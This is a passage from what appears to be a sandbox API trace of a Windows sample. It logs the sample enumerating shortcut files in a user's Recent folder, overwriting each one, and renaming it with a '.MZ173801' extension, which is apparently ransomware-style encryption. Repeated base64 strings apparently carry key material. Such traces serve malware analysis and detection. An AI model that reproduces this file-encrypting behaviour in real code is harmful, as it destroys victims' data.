lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.503] GetCurrentThreadId () returned 0x1358 [0109.503] GetCurrentThreadId () returned 0x1358 [0109.504] GetCurrentThreadId () returned 0x1358 [0109.504] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JRD90ylj1Dg_Ngx4FKM.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jrd90ylj1dg_ngx4fkm.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.504] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.504] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.504] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x496 [0109.504] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.504] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x496, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x496, lpOverlapped=0x0) returned 1 [0109.505] CloseHandle (hObject=0x3f4) returned 1 [0109.505] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JRD90ylj1Dg_Ngx4FKM.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jrd90ylj1dg_ngx4fkm.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.506] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x496, lpOverlapped=0x0) returned 1 [0109.506] CloseHandle (hObject=0x3f4) returned 1 [0109.507] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JRD90ylj1Dg_Ngx4FKM.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jrd90ylj1dg_ngx4fkm.flv.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JRD90ylj1Dg_Ngx4FKM.flv.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jrd90ylj1dg_ngx4fkm.flv.lnk.mz173801")) returned 1 [0109.508] GetCurrentThreadId () returned 0x1358 [0109.508] GetCurrentThreadId () returned 0x1358 [0109.508] GetCurrentThreadId () returned 0x1358 [0109.508] GetCurrentThreadId () returned 0x1358 [0109.508] GetCurrentThreadId () returned 0x1358 [0109.508] GetCurrentThreadId () returned 0x1358 [0109.508] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7644b3fd, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7644b3fd, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7644dade, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x441, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="jt9dNiGSkN.lnk", cAlternateFileName="JT9DNI~1.LNK")) returned 1 [0109.508] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.508] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.508] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jt9dNiGSkN.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jt9dnigskn.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7644b3fd, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7644b3fd, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7644dade, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x441)) returned 1 [0109.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.509] GetCurrentThreadId () returned 0x1358 [0109.509] GetCurrentThreadId () returned 0x1358 [0109.509] GetCurrentThreadId () returned 0x1358 [0109.509] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.509] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.509] GetCurrentThreadId () returned 0x1358 [0109.509] GetCurrentThreadId () returned 0x1358 [0109.509] GetCurrentThreadId () returned 0x1358 [0109.509] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jt9dNiGSkN.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jt9dnigskn.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.509] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.510] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.510] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x441 [0109.510] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.510] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x441, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x441, lpOverlapped=0x0) returned 1 [0109.511] CloseHandle (hObject=0x3f4) returned 1 [0109.511] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jt9dNiGSkN.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jt9dnigskn.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.512] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x441, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x441, lpOverlapped=0x0) returned 1 [0109.512] CloseHandle (hObject=0x3f4) returned 1 [0109.513] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jt9dNiGSkN.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jt9dnigskn.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jt9dNiGSkN.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jt9dnigskn.lnk.mz173801")) returned 1 [0109.513] GetCurrentThreadId () returned 0x1358 [0109.514] GetCurrentThreadId () returned 0x1358 [0109.514] GetCurrentThreadId () returned 0x1358 [0109.514] GetCurrentThreadId () returned 0x1358 [0109.514] GetCurrentThreadId () returned 0x1358 [0109.514] GetCurrentThreadId () returned 0x1358 [0109.514] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea78f1bf, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea78f1bf, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea78f1bf, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3b0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="K4Pe6YIq.lnk", cAlternateFileName="")) returned 1 [0109.514] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.514] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.514] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\K4Pe6YIq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\k4pe6yiq.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea78f1bf, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea78f1bf, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea78f1bf, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3b0)) returned 1 [0109.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.515] GetCurrentThreadId () returned 0x1358 [0109.515] GetCurrentThreadId () returned 0x1358 [0109.515] GetCurrentThreadId () returned 0x1358 [0109.515] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 